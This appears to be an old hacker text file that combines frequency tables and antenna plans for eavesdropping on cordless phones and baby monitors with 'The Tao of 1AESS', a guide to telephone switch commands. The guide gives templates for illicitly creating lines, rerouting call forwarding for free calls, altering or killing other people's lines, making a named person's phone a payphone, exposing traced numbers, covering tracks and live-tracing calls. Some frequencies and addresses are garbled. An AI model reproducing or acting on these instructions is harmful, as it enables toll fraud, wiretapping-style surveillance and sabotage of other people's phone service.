The scanner modification handbooks offer a plethora of information
|
||
on hacking scanners. Hacks include: increased channel capacity
|
||
(example: RS PRO-2006 from 400 channels to 6,400!), adding signal-
|
||
strength meters, cellular-freq. restoration, scanning-speed
|
||
increases, and much more.
|
||
|
||
World Scanner Report, by Bill Cheek
|
||
A monthly newsletter on the latest scanner hacks.
|
||
|
||
Available from:
|
||
COMMtronics Engineering
|
||
Box 262478
|
||
San Diego, CA 82196-2478
|
||
BBS: (619) 578-9247 (5:30PM to 1:30PM P.S.T. ONLY!)
|
||
|
||
COMMtronics Engineering also offers a scanner-computer interface
|
||
for RS PRO-43/2004/2005/2006 model scanners.
|
||
===================================================================
|
||
CRB Research Books
|
||
Box 56
|
||
Commack, MY 11725
|
||
|
||
CRB has books on scanner modifications, frequency guides, and other
|
||
interesting subjects.
|
||
=================================================================
|
||
POPULAR COMMUNICATIONS
|
||
|
||
CQ Publications
|
||
76 N. Broadway
|
||
Hicksville, NY 11801
|
||
(516) 681-2926
|
||
|
||
Pop Comm is a monthly magazine on all sorts of radio monitoring,
|
||
including scanning, shortwave, and broadcast.
|
||
==================================================================
|
||
MONITORING TIMES
|
||
|
||
Grove Enterprises, Inc.
|
||
P.O. Box 98,
|
||
300 S. Highway 64 West
|
||
Brasstown, North Carolina 28902-0098
|
||
|
||
M.T. is a monthly magazine covering all varieties of radio
|
||
communications.
|
||
|
||
==================================================================
|
||
NUTS & VOLTS
|
||
Nuts & Volts is a monthly magazine that covers a wide variety of
|
||
electronic-related subjects.
|
||
|
||
T&L Publications, Inc.
|
||
430 Princeland Court
|
||
Corona, CA 91719
|
||
(909) 371-8497
|
||
(909) 371-3052 fax
|
||
CI$ 74262,3664
|
||
1-800-783-4624 SUBSCRIPTION ORDERS ONLY
|
||
===================================================================
|
||
USENET:
|
||
alt.radio.scanner
|
||
rec.radio.scanner
|
||
===================================================================
|
||
|
||
Charts & Tables:
|
||
|
||
1. Cordless Telephone Frequencies (VHF)
|
||
2. Cordless Telephone Frequencies (900MHz)
|
||
3. Cellular Telephone Frequencies
|
||
4. Business Band Frequencies (VHF, UHF, 800MHz)
|
||
5. IMTS Frequencies
|
||
6. PAGER Frequencies
|
||
7. PACKET Frequencies
|
||
8. ROOM MONITOR Frequencies
|
||
9. homebrew cordless dipole antenna
|
||
10. homebrew 1/4 wave groundplane antenna
|
||
|
||
|
||
=================================================================
|
||
TABLE 1 - CORDLESS TELEPHONE FREQS. (CONVENTIONAL)
|
||
|
||
CH BASE HANDSET
|
||
-- ---- -------
|
||
1 46.100 49.670
|
||
2 46.630 49.845
|
||
3 46.670 49.860
|
||
4 46.710 49.770
|
||
5 46.730 49.875
|
||
6 46.770 49.830
|
||
7 46.830 49.890
|
||
8 46.870 49.930
|
||
9 46.930 49.990
|
||
10 46.970 46.970
|
||
=================================================================
|
||
TABLE 2 - 900MHz CORDLESS FREQS.
|
||
|
||
Cordless phones have been allocated the frequencies
|
||
between 902-228MHz, with channel spacing between
|
||
30-100KHz.
|
||
Following are some examples of the frequencies used by phones
|
||
currently on the market.
|
||
|
||
----------------------------------------------------------------
|
||
Panasonic KX-T9000 (60 Channels)
|
||
base 902.100 - 903.870 Base frequencies (30Khz spacing)
|
||
handset 926.100 - 927.870 Handset frequencies
|
||
CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
|
||
-- ------- ------- -- ------- ------- -- ------- -------
|
||
01 902.100 926.100 11 902.400 926.400 21 902.700 926.700
|
||
02 902.130 926.130 12 902.430 926.430 22 902.730 926.730
|
||
03 902.160 926.160 13 902.460 926.460 23 902.760 926.760
|
||
04 902.190 926.190 14 902.490 926.490 24 902.790 926.790
|
||
05 902.220 926.220 15 902.520 926.520 25 902.820 926.820
|
||
06 902.250 926.250 16 902.550 926.550 26 902.850 926.850
|
||
07 902.280 926.280 17 902.580 926.580 27 902.880 926.880
|
||
08 902.310 926.310 18 902.610 926.610 28 902.910 926.910
|
||
09 902.340 926.340 19 902.640 926.640 29 902.940 926.940
|
||
10 902.370 926.370 20 902.670 926.670 30 902.970 926.970
|
||
|
||
31 903.000 927.000 41 903.300 927.300 51 903.600 927.600
|
||
32 903.030 927.030 42 903.330 927.330 52 903.630 927.630
|
||
33 903.060 927.060 43 903.360 927.360 53 903.660 927.660
|
||
34 903.090 927.090 44 903.390 927.390 54 903.690 927.690
|
||
35 903.120 927.120 45 903.420 927.420 55 903.720 927.720
|
||
36 903.150 927.150 46 903.450 927.450 56 903.750 927.750
|
||
37 903.180 927.180 47 903.480 927.480 57 903.780 927.780
|
||
38 903.210 927.210 48 903.510 927.510 58 903.810 927.810
|
||
39 903.240 927.240 49 903.540 927.540 59 903.840 927.840
|
||
40 903.270 927.270 50 903.570 927.570 60 903.870 927.870
|
||
|
||
------------------------------------------------------------
|
||
|
||
V-TECH TROPEZ DX900 (20 CHANNELS)
|
||
905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
|
||
925.5 - 927.4 HANDSET FREQUENCIES
|
||
|
||
CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
|
||
-- ------- ------- -- ------- ------- -- ------- -------
|
||
01 905.600 925.500 08 906.300 926.200 15 907.000 926.900
|
||
02 905.700 925.600 09 906.400 926.300 16 907.100 927.000
|
||
03 905.800 925.700 10 906.500 926.400 17 907.200 927.100
|
||
04 905.900 925.800 11 906.600 926.500 18 907.300 927.200
|
||
05 906.000 925.900 12 906.700 926.600 19 907.400 927.300
|
||
06 906.100 926.000 13 906.800 926.700 20 907.500 927.400
|
||
07 906.200 926.100 14 906.900 926.800
|
||
|
||
------------------------------------------------------------
|
||
OTHER 900 MHZ CORDLESS PHONES
|
||
AT&T #9120 - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ
|
||
OTRON CORP. #CP-1000 902.1 - 903.9 & 926.1 - 927.9 MHZ
|
||
SAMSUNG #SP-R912- - - 903.0 & 927.0 MHZ
|
||
|
||
------------------------------------------------------------
|
||
==================================================================
|
||
TABLE 3 - CELLULAR TELEPHONE FREQUENCIES
|
||
wireline ("b" side carrier)
|
||
824.1000-834.9000
|
||
869.0100-879.9900
|
||
|
||
non-wireline ("a" side carrier)
|
||
835.0200-849.0000
|
||
880.0200-894.0000
|
||
|
||
|
||
==================================================================
|
||
TABLE 4 - BUSINESS BAND RADIO FREQS.
|
||
|
||
151.5050-151.9550MHz
|
||
154.4900-154.5400
|
||
460.6500-462.1750
|
||
462.7500-465.0000
|
||
471.8125-471.3375
|
||
474.8125-475.3375
|
||
896.0125-900.9875
|
||
935.0125-939.9875
|
||
806.0125-810.9875
|
||
811.0125-815.9875
|
||
816.0125-820.9875
|
||
851.0125-855.9875
|
||
856.0125-860.9875
|
||
861.0125-865.9875
|
||
=================================================================
|
||
TABLE 5 - MOBILE TELEPHONE FREQS. (see note1 below)
|
||
SIMPLEX OUTPUT INPUT OUTPUT INPUT
|
||
-------- -------- -------- -------- --------
|
||
035.2600 152.0300 158.4900 454.3750 459.3750
|
||
035.3000 152.0600 158.5200 454.4000 459.4000
|
||
035.3400 152.0900 158.5500 454.4250 459.4250
|
||
035.3800 152.1200 158.5800 454.4500 459.4500
|
||
035.5000 152.1500 158.6100 454.4750 459.4750
|
||
035.5400 152.1800 158.6400 454.5000 459.5000
|
||
035.6200 152.2100 158.6700 454.5250 459.5250
|
||
035.6600* 454.0250 459.0250 454.5500 459.5500
|
||
043.2200* 454.0500 459.0500 454.5750 459.5750
|
||
043.2600 454.0750 459.0750 454.6000 459.6000
|
||
043.3400 454.1000 459.1000 454.6250 459.6250
|
||
043.3800 454.1250 459.1250 454.6500 459.6500
|
||
043.4200 454.1500 459.1500
|
||
043.3000 454.1750 459.1750
|
||
043.5000 454.2000 459.2000
|
||
043.5400 454.2250 459.2250
|
||
043.5800* 454.2500 459.2500
|
||
043.6400* 454.2750 459.2750
|
||
152.2400* 454.3000 459.3000
|
||
152.8400* 454.3250 459.3250
|
||
158.1000* 454.3500 459.3500
|
||
158.7000*
|
||
|
||
*-also allocated for pager usage
|
||
|
||
(note1: These freqs are, for the most part, dead. The FCC has
|
||
reallocated most of these for other services.)
|
||
|
||
=================================================================
|
||
TABLE 6 - PAGER FREQUENCIES
|
||
035.2200 035.5800 152.4800 154.6250 158.4600
|
||
157.7400 465.0000 462.8000 462.7750 462.9250
|
||
462.7500 462.8750 462.8250 462.9000 462.8500
|
||
928.0000 929.0000 930.0000 931.0000
|
||
=================================================================
|
||
TABLE 7 - PACKET FREQUENCIES
|
||
050.6200
|
||
223.5200-223.6400
|
||
223.7100-223.8500
|
||
2303.500-2303.800
|
||
2303.900
|
||
2399.000-2399.500
|
||
=================================================================
|
||
TABLE 8 - BABY MONITOR FREQUENCIES
|
||
49.300
|
||
49.830
|
||
49.845
|
||
49.890
|
||
=================================================================
|
||
TABLE 9 - AIR PHONE FREQUENCIES
|
||
OUTPUT INPUT
|
||
454.6750 459.6750
|
||
454.9750 459.9750
|
||
849.0000 851.0000
|
||
894.0000 896.0000
|
||
==================================================================
|
||
|
||
CHART 10 - IMPROVED ANTENNA FOR CORDLESS MONITORING
|
||
|
||
The best way to improve the range for monitoring cordless
|
||
telephones is to use an antenna specifically cut for the
|
||
frequencies used in cordless phones. The following is a very
|
||
effective, yet easy to build, "homebrew" antenna.
|
||
|
||
CORDLESS DIPOLE
|
||
---------------
|
||
materials needed:
|
||
wire - virtually any type will suffice
|
||
matching transformer (RS part number 15-1296)
|
||
f connector (RS part number 278-225)
|
||
??? connector (this will connect the antenna to the scanner, so it
|
||
will be dependant upon what type of antenna jack the scanner
|
||
utilizes. Most use a BNC-type connector. Some older models
|
||
will use a Motorola-type connector.)
|
||
coax cable - while many types of coax can be used, a low-loss cable
|
||
would be best, especially if a long cable run is required.
|
||
RG-6 satellite coax (RS part number 278-1316) is a good choice.
|
||
|
||
|
||
wire transformer wire
|
||
-------------------------< >-------------------------
|
||
+ f connector
|
||
|
|
||
| coax
|
||
|
|
||
|
|
||
* connector
|
||
[ ] scanner
|
||
|
||
=================================================================
|
||
|
||
CHART 11 - 1/4 WAVE GROUND PLANE ANTENNA
|
||
|
||
Here is a simple-to-build antenna that will improve reception for
|
||
a particular frequency area.
|
||
|
||
materials needed:
|
||
wire - a rigid wire is needed here. Clothes hangers work well.
|
||
panel mount SO-239 connector (RS part number 278-201)
|
||
male PL-259 connector (RS part number 278-205)
|
||
coax cable
|
||
connector (to scanner)
|
||
|
||
|
||
|
|
||
|
|
||
|
|
||
|
|
||
[ ]
|
||
/ \
|
||
/ \
|
||
/ \
|
||
|
||
|
||
The length of the five rods will be dependant upon the frequency
|
||
you intend to monitor. Use the following formula:
|
||
|
||
WL=3X10^8/F
|
||
|
||
WL = wavelegnth (in meters)
|
||
F = frequency (in MHz)
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
-=-
|
||
|
||
-= The Tao of 1AESS =-
|
||
-=-=-=-=-=-=-=-=
|
||
-= DeadKat&Disorder =-
|
||
|
||
-=-
|
||
|
||
-= Special thanks to Gatsby and Mark Tabas =-
|
||
|
||
|
||
Introduction
|
||
-=-=-=-=-=-=
|
||
The Bell System's first trial of electronic switching took place in Morris,
|
||
Illinois, in 1960. The Morris trial culminated a 6-year development and
|
||
proved the viability of the stored-program control concept. The first
|
||
application of electronic local switching in the Bell System occurred in May
|
||
1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
|
||
|
||
The 1ESS switching system was designed for use in areas where large numbers
|
||
of lines and lines with heavy traffic (primarily business customers) are
|
||
served. The system has generally been used in areas serving between 10,000
|
||
and 65,000 lines and has been the primary replacement system for urban
|
||
step-by-step and panel systems. The ease and flexibility of adding new
|
||
services made 1ESS switching equipment a natural replacement vehicle in
|
||
city applications where the demand for new, sophisticated business and
|
||
residence services is high.
|
||
|
||
In 1976, the first electronic toll switching system to operate a digital
|
||
time-division switching network under stored-program control, the 4ESS
|
||
system, was placed in service. It used a new control, the 1A processor,
|
||
for the first time to gain a call carrying capacity in excess of 550,000
|
||
busy-hour calls. The 1A processor was also designed for local switching
|
||
application. It doubled the call-carrying capacity of the 1ESS switching
|
||
system and was introduced in 1976 in the first 1AESS switch. The network
|
||
capacity of 1ESS switching equipment was also doubled to allow the 1AESS
|
||
switch to serve 130,000 lines.
|
||
|
||
In addition to local telephone service, the 1AESS switches offer a variety
|
||
of special services. Custom Local Area Switching Services (CLASS) are
|
||
available as well Custom Calling Services. Business customers may select
|
||
offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications
|
||
Service, or electronic tandem switching.
|
||
|
||
Although more modern switches like 5ESS and DMS 200 have been developed, it
|
||
is estimated that some 50 percent of all switches are still 1AESS.
|
||
|
||
Commands
|
||
-=-=-=-=
|
||
The 1AESS uses a command line interface for all commands. The commands are
|
||
divided into three fields: action, identification, and data. The fields
|
||
are always separted by a colon. Every command is terminated by either a
|
||
period for verification commands or a 'ballbat' (!) for change commands.
|
||
The control-d is used to execute the command instead of a return. The
|
||
underscore is used as a backspace. Commands are always typed in 'all caps'.
|
||
|
||
The action field is the first field of the command and is ended by a colon.
|
||
The identification field is ended by the second colon. The identification
|
||
field has one or two subfields which are separated by a semicolon. Semicolons
|
||
are not used elsewhere in the command. The data field consists of keyword
|
||
units and is the remaining portion of the command.
|
||
|
||
Basic Machine Commands
|
||
-=-=-=-=-=-=-=-=-=-=-=
|
||
These commands provide useful information from the system. The WHO-RV-
|
||
command will tell you what CO it is and what version of the OS is installed.
|
||
If your output is scrolling off the screen press space to end scrolling.
|
||
The V-STOP- command will clear the buffer.
|
||
|
||
WHO-RV-. System information.
|
||
SPACE Stops output from scrolling.
|
||
V-STOP-. Free buffer of remaining LENS/INFO.
|
||
|
||
Channel Commands
|
||
-=-=-=-=-=-=-=-=
|
||
Channel commands are used to redirect input and output. If a switch won't
|
||
respond to a command use the OP:CHAN command to check on current channel.
|
||
If your channel is not responding, use the MON:CHAN command to switch output
|
||
and control to your terminal (the remote). You can check the status of the
|
||
RC with the RCCENSUS command.
|
||
|
||
OP:CHAN:MON! Shows all channels which are being monitored.
|
||
MON:CHAN SC1;CHAN LOC! Redirect output to remote screen.
|
||
STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen.
|
||
(This command needs to be done after you
|
||
are finished to help cover your tracks)
|
||
OP:RCCENSUS! To see recent change status.
|
||
|
||
|
||
Tracing Commands
|
||
-=-=-=-=-=-=-=-=
|
||
CI-LIST- will give you a list of all numbers which are being traced
|
||
externally. It will not show you lines which are being traced
|
||
internally, ie: numbers inside one of the prefixes controlled
|
||
by the switch you are on.
|
||
|
||
CI-LIST-. Traced line list.
|
||
|
||
|
||
Check Features on Line
|
||
-=-=-=-=-=-=-=-=-=-=-=
|
||
The VF command is used to check the current settings on a line.
|
||
The DN XXXXXXX specifies the phone number of the line you wish to check.
|
||
Replace XXXXXXX with the seven digit phone number of the line you are
|
||
checking.
|
||
|
||
VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line.
|
||
VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features
|
||
|
||
Call Features CWT- Call Waiting
|
||
CFB- Call Forward Busy - Busy=VM
|
||
CFV- Call Forwarding Variable
|
||
CFD- Call Forward Don't answer
|
||
TWC- Three Way Calling
|
||
TTC- Touch Tone
|
||
RCY- Ring Cycle
|
||
SC1- Speed Calling 1
|
||
SC2- Speed Calling 2
|
||
UNA- No Long Distance
|
||
PXX- Block all LD service (guess)
|
||
MWI- Message Waiting Indicator
|
||
CHD- centrex(unremarkable)
|
||
CPU- centrex(unremarkable)
|
||
CLI- Calling Line Identification (CID)
|
||
ACB- Automatic Call Back Feature (?)
|
||
BLN- Special Toll Billing
|
||
FRE- Free Calling
|
||
|
||
The standard output of a command appears below. The 'DN 348 2141' specifies
|
||
the number you are checking. The calling features will be listed on the
|
||
second line by their three letter acronyms. This line has call waiting
|
||
(CWT), a trace (TRC), and touch tone dialing (TTC).
|
||
|
||
Example of 1A output:
|
||
|
||
M 53 TR75 2 DN 348 2141 00000003
|
||
CWT TRC TTC
|
||
|
||
|
||
Searching For Free Lines
|
||
-=-=-=-=-=-=-=-=-=-=-=-=
|
||
The VFY command can be used to check if a line is in use. The output will
|
||
list the LEN (Line Equipment Number) for the line and its call features in
|
||
octal. If the LEN is all zeros, then that number has not been assigned.
|
||
Replace XXXXXXX with the number you wish to check. You must prefix the
|
||
phone number with 30. You can also check for unused LEN's using the VFY
|
||
command. Use the space bar to stop scrolling and the V-STOP command to
|
||
cancel when looking up free LEN's.
|
||
|
||
VFY-DN-30XXXXXXX. Search for free lines.
|
||
VFY-LEN-4100000000. List all free LENs.
|
||
VFY-TNN-XXXXXXXX. To get information on trunk.
|
||
|
||
The output for the VFY-DN command will appear like the one below. Notice
|
||
that this number has been assigned a LEN so it is in use.
|
||
|
||
M 06 TR01 796 9146
|
||
0 0 0 0
|
||
LEN 01 025 000
|
||
001 000 000 000 000 000 4
|
||
000 000 000 000 000 000 000 000
|
||
0 0 0 0
|
||
0 0 0 0 0
|
||
|
||
|
||
Searching for a Particular Feature on a Line (like trace)
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
All line information is stored in the switch for its coverage area. The
|
||
switch is like a huge database in this sense. You can do global searches
|
||
on the switch for any feature. One especially interesting feature to search
|
||
for are traced numbers. Traced numbers listed this way are INTERNALLY
|
||
traced as opposed to globally traced numbers shown with the CI-LIST- command.
|
||
Global and internal trace lists are always very different. And remember,
|
||
be a good samaritan and call the person being traced and let them know! ;-)
|
||
|
||
VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area with
|
||
trace on it (takes a sec).
|
||
|
||
You can exmatch for any LASS feature by replacing the keyword TRACE with any
|
||
call feature like call forwarding (CFB) and speed calling (SC1).
|
||
|
||
|
||
To See What Numbers Are on a Speed Calling List
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
Another nice use for the VFY command is to see what is on a line's speed
|
||
calling list. Replace XXXXXXX with the target phone number. One devious
|
||
use is to look at the CO's speed call list to find other internal telco
|
||
numbers.
|
||
|
||
VFY-LIST-09XXXXXXX020000
|
||
09=mask 02=single list (one digit speed calling)
|
||
20=double list (two digit speed calling)
|
||
28= " "
|
||
36= " "
|
||
44= " "
|
||
|
||
|
||
To Build a Line
|
||
-=-=-=-=-=-=-=-
|
||
The recent change command (RC) is used to create and modify lines. Because
|
||
RC commands are usually very long and complex, they are typed on multiple
|
||
lines to simplify them. Each subfield of the data section of the command is
|
||
typed on a separate line ended by a slash (\) followed by pressing ctrl-d.
|
||
To create a line, you specify LINE in the identification field. Before
|
||
a line can be created, you must first locate an unused number by using the
|
||
VFY-DN command explained above. Once a free number has been found, you
|
||
use the VFY-LEN to find an available LEN. To build a new line, follow
|
||
these steps:
|
||
|
||
First, find spare LEN (VFY-LEN-4100000000.). Next find free line. Now type
|
||
in the RC commands using the following commands as a template:
|
||
|
||
RC:LINE:\ (create a line)
|
||
ORD 1\ (execute the command immediately)
|
||
TN XXXXXXX\ (telephone number)
|
||
LEN XXXXXXXX\ (len found from above)
|
||
LCC 1FR\ (line class code 1fr)
|
||
CFV\ (call forward)
|
||
XXX 288\ (type XXX, space, then the three digit PIC)
|
||
ld carrier - 222 - MCI
|
||
288 - AT&T
|
||
333 - Sprint, etc.)
|
||
! (BEWM, don't forget the ctrl-d!!)
|
||
|
||
(Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE
|
||
has taken affect)
|
||
|
||
|
||
Creating Call Forwarding Numbers
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
The call forwarding feature is the most important feature for hackers. By
|
||
creating a line or modifying an existing line with call forwarding, you can
|
||
than use it to make free phone calls. You set the line to call forward/
|
||
no ring and then give it the call forwarded number. This will allow you
|
||
to call the modified line and be instantly forwarded to your pre-chosen
|
||
destination.
|
||
|
||
First create a line using RC:LINE:, then modify the line using the following
|
||
commands as a template.
|
||
|
||
RC:CFV:\ (add call forwarding to a line.. begin: )
|
||
ORD 1\ (execute the command immediately)
|
||
BASE XXXXXXX\ (base number you are changing)
|
||
TO XXXXXXX\ (local - XXXXXXX : ld - XXXXXXXXXX )
|
||
PFX\ (set prefix to 1 if ld)
|
||
! (BEWM)
|
||
|
||
|
||
To Change Call Forward Number
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
It is safer to modify an existing call forward than to create a new line
|
||
solely for this purpose. You can use the VFY command and EXMATCH for CFB to
|
||
find lines with call forwarding. Before you can change the call forwarding
|
||
'TO' number you must delete the old one. Remove call forward number using
|
||
CFV:OUT with the template below.
|
||
|
||
RC:CFV;OUT:\ (remove call forward number...begin: )
|
||
ORD 1\ (execute command immediately)
|
||
BASE XXXXXXX\ (number to remove it from)
|
||
! (Yeeee-Hahhhahah)
|
||
|
||
|
||
Make Call Forward Not Ring
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
The only drawback to call forwarding off someone's line is if rings they
|
||
might answer. To get around this, you add the call-forward no-ring option
|
||
(ICFRR) using the following as a template.
|
||
|
||
RC:LINE;CHG:\ (recent change line to be specified)
|
||
ORD 1\ (execute command immediately)
|
||
TN XXXXXXX\ (number you wanna fuck with)
|
||
ICFRR\ (this takes the ring off)
|
||
! (Go!)
|
||
|
||
|
||
Adding a feature to a line
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
The RC:LINE;CHG: can also be used to add any other call feature. Use the
|
||
same template but change the feature.
|
||
|
||
RC:LINE;CHG:\ (this is used for changing features)
|
||
ORD 1\ (order number)
|
||
TN XXXXXXX (telephone number you are fucking with)
|
||
TWC\ (replace this with any feature you wish)
|
||
! (Fire!)
|
||
|
||
|
||
Removing a Feature
|
||
-=-=-=-=-=-=-=-=-=
|
||
Use the NO delimiter to remove a feature from a line.
|
||
|
||
RC:LINE;CHG:\ (change a feature)
|
||
ORD 1\ (effective immediately)
|
||
TN XXXXXXX\ (telephone number)
|
||
CFV NO\ (feature followed by NO)
|
||
! (Boo-Ya!)
|
||
|
||
|
||
Change Phone number into payphone
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||
You've read about in the Hacker Crackdown, now you too can be 31337 and
|
||
change Gail Thackery's phone into a payphone. In fact you can change the
|
||
line class code (LCC) to anything you want. To display the LCC of a line
|
||
use the following and replace the XXXXXXX with the line you wish to view.
|
||
|
||
VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code)
|
||
DTF = Payphone
|
||
1FR = Flat Rate
|
||
1MR = Measured Rate
|
||
1PC = One Pay Phone
|
||
CDF = DTF Coin
|
||
PBX = Private Branch Exchange
|
||
CFD = Coinless(ANI7) Charge-a-call
|
||
INW = InWATS (800!@#)
|
||
OWT = OutWATS
|
||
PBM = O HO/MO MSG REG (NO ANI)
|
||
PMB = LTG = 1 HO/MO (Regular ANI6)
|
||
(ani6 and ani7 - only good for DMS)
|
||
|
||
To change the line into a payphone use the RC:LINE;CHG command and modify
|
||
the LCC like the example below.
|
||
|
||
RC:LINE;CHG;\ (this is used for changing features)
|
||
ORD 1\ (order number)
|
||
TN XXXXXXX\ (telephone number you are fucking with)
|
||
LCC DTF\ (line class code you are changing to)
|
||
! (Make it so.)
|
||
|
||
*(You may have to remove some LASS features when doing this)*
|
||
|
||
|
||
To Kill a Line and Remove It Permanently
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
If you need to delete a line you have created (or haven't) use the following
|
||
syntax.
|
||
|
||
RC:LINE;OUT:\ (remove line)
|
||
ORD 1\ (effective immediately)
|
||
TN XXXXXXX\ (on this number)
|
||
! (GO!)
|
||
|
||
|
||
Monitoring Phone Calls
|
||
-=-=-=-=-=-=-=-=-=-=-=
|
||
There are powerful utilities to monitor calls and affect phone lines
|
||
available on a 1A. The T-DN- commands allow you to check the current
|
||
status of line and make it busy or idle. If a line happens to be active
|
||
you can use the NET-LINE- command to trace the call and find the numbers
|
||
for both calling parties.
|
||
|
||
T-DN-RD XXXXXXX. See if call in progress.
|
||
output: =1 line busy
|
||
=0 line idle
|
||
T-DN-MB XXXXXXX. Make line busy.
|
||
T-DN-MI XXXXXXX. Make line idle.
|
||
NET-LINE-XXXXXXX0000. To do a live trace on a phonenumber thru
|
||
switch.
|
||
NET-TNN-XXXXXX Same as above for trunk trace
|
||
|
||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
|
||
Appendix 1 - Common output messages seen on 1A switches
|
||
-=-=-=-=-=
|
||
|
||
** ALARM **
|
||
|
||
AR01 Office alarm
|
||
AR02 Alarm retired or transferred
|
||
AR03 Fuse blown
|
||
AR04 Unknown alarm scan point activated
|
||
AR05 Commercial power failure
|
||
AR06 Switchroom alarm via alarm grid
|
||
AR07 Power plant alarm
|
||
AR08 Alarm circuit battery loss
|
||
AR09 AMA bus fuse blown
|
||
AR10 Alarm configuration has been changed (retired,inhibited)
|
||
AR11 Power converter trouble
|
||
AR13 Carrier group alarm
|
||
AR15 Hourly report on building and power alarms
|
||
|
||
** AUTOMATIC TRUNK TEST **
|
||
AT01 Results of trunk test
|
||
|
||
** CARRIER GROUP **
|
||
CG01 Carrier group in alarm
|
||
CG03 Reason for above
|
||
|
||
** COIN PHONE **
|
||
CN02 List of pay phones with coin disposal problems
|
||
CN03 Possible Trouble
|
||
CN04 Phone taken out of restored service because of possible coin fraud
|
||
|
||
** COPY **
|
||
COPY Data copied from one address to another
|
||
|
||
** CALL TRACE **
|
||
CT01 Manually requested trace line to line, information follows
|
||
CT02 Manually requested trace line to trunk, information follows
|
||
CT03 Intraoffice call placed to a number with CLID
|
||
CT04 Interoffice call placed to a number with CLID
|
||
CT05 Call placed to number on the CI list
|
||
CT06 Contents of the CI list
|
||
CT07 ACD related trace
|
||
CT08 ACD related trace
|
||
CT09 ACD related trace
|
||
|
||
** DIGITAL CARRIER TRUNK **
|
||
DCT COUNTS Count of T carrier errors
|
||
|
||
** MEMORY DIAGNOSTICS **
|
||
DGN Memory failure in cs/ps diagnostic program
|
||
|
||
** DIGITAL CARRIER "FRAME" ERRORS **
|
||
FM01 DCT alarm activated or retired
|
||
FM02 Possible failure of entire bank not just frame
|
||
FM03 Error rate of specified digroup
|
||
FM04 Digroup out of frame more than indicated
|
||
FM05 Operation or release of the loop terminal relay
|
||
FM06 Result of digroup circuit diagnostics
|
||
FM07 Carrier group alarm status of specific group
|
||
FM08 Carrier group alarm count for digroup
|
||
FM09 Hourly report of carrier group alarms
|
||
FM10 Public switched digital capacity failure
|
||
FM11 PUC counts of carrier group errors
|
||
|
||
** MAINTENANCE **
|
||
MA02 Status requested, print out of MACII scratch pad
|
||
MA03 Hourly report of system circuits and units in trouble
|
||
MA04 Reports condition of system
|
||
MA05 Maintenance interrupt count for last hour
|
||
MA06 Scanners,network and signal distributors in trouble
|
||
MA07 Successful switch of duplicated unit (program store etc.)
|
||
MA08 Excessive error rate of named unit
|
||
MA09 Power should not be removed from named unit
|
||
MA10 OK to remove paper
|
||
MA11 Power manually removed from unit
|
||
MA12 Power restored to unit
|
||
MA13 Indicates central control active
|
||
MA15 Hourly report of # of times interrupt recovery program acted
|
||
MA17 Centrex data link power removed
|
||
MA21 Reports action taken on MAC-REX command
|
||
MA23 4 minute report, emergency action phase triggers are inhibited
|
||
|
||
** MEMORY **
|
||
MN02 List of circuits in trouble in memory
|
||
|
||
** NETWORK TROUBLE **
|
||
NT01 Network frame unable to switch off line after fault detection
|
||
NT02 Network path trouble Trunk to Line
|
||
NT03 Network path trouble Line to Line
|
||
NT04 Network path trouble Trunk to Trunk
|
||
NT06 Hourly report of network frames made busy
|
||
NT10 Network path failed to restore
|
||
|
||
** OPERATING SYSTEM STATUS **
|
||
OP:APS-0
|
||
OP:APSTATUS
|
||
OP:CHAN
|
||
OP:CISRC Source of critical alarm, automatic every 15 minutes
|
||
OP:CSSTATUS Call store status
|
||
OP:DUSTATUS Data unit status
|
||
OP:ERAPDATA Error analysis database output
|
||
OP:INHINT Hourly report of inhibited devices
|
||
OP:LIBSTAT List of active library programs
|
||
OP:OOSUNITS Units out of service
|
||
OP:PSSTATUS Program store status
|
||
|
||
** PLANT MEASUREMENTS **
|
||
PM01 Daily report
|
||
PM02 Monthly report
|
||
PM03 Response to a request for a specific section of report
|
||
PM04 Daily summary of IC/IEC irregularities
|
||
|
||
** REPORT **
|
||
REPT:ADS FUNCTION Reports that a ADS function is about to occur
|
||
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
|
||
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
|
||
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
|
||
REPT:ADS PROCEDURAL ERROR You fucked up
|
||
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
|
||
REPT:PROG CONT OFF-NORMAL System programs that are off or on
|
||
REPT:RC CENSUS Hourly report on recent changes
|
||
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
|
||
|
||
** RECENT CHANGE **
|
||
RC18 RC message response
|
||
|
||
** REMOVE **
|
||
RMV Removed from service
|
||
|
||
** RESTORE **
|
||
RST Restored to service status
|
||
|
||
** RINGING AND TONE PLANT **
|
||
RT04 Status of monitors
|
||
|
||
** SOFTWARE AUDIT **
|
||
SA01 Call store memory audit results
|
||
SA03 Call store memory audit results
|
||
|
||
